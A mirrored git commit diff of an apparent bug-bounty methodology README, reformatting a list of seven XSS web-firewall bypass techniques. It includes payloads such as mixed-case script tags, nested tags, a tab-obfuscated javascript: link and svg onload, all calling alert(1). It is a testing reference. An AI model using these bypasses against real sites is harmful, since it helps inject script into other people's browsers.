mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-23 12:13:05 +00:00
Update README.md
This commit is contained in:
parent
d3a16197aa
commit
b6d25c758a
1 changed files with 13 additions and 1 deletions
14
README.md
14
README.md
|
@ -266,22 +266,34 @@ Here’s list of tools [@_justYnot](https://twitter.com/_justYnot) used:
|
|||
## XSS firewall bypass techniques
|
||||
Here’s a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:
|
||||
1. Check if the firewall is blocking only lowercase:
|
||||
<sCRipT>alert(document.domain)</sCRiPt>
|
||||
```
|
||||
<sCRipT>alert(1)</sCRiPt>
|
||||
```
|
||||
|
||||
2. Try to break firewall regex with new line (\r\n), aka. CRLF injection:
|
||||
```
|
||||
<script>%0d%0aalert(1)</script>
|
||||
```
|
||||
|
||||
3. Try double encoding:
|
||||
```
|
||||
%2522
|
||||
```
|
||||
|
||||
4. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:
|
||||
```
|
||||
<scr<script>ipt>alert(1);</scr</script>ipt>
|
||||
```
|
||||
|
||||
5. Injecting anchor tag without whitespaces:
|
||||
```
|
||||
<a/href="j	a	v	asc	ri	pt:alert(1)">
|
||||
```
|
||||
|
||||
6. Try to bypass whitespaces using a bullet:
|
||||
```
|
||||
<svg•onload=alert(1)>
|
||||
```
|
||||
|
||||
7. Try to change request method (POST instead of GET):
|
||||
|
||||
|
|
Loading…
Reference in a new issue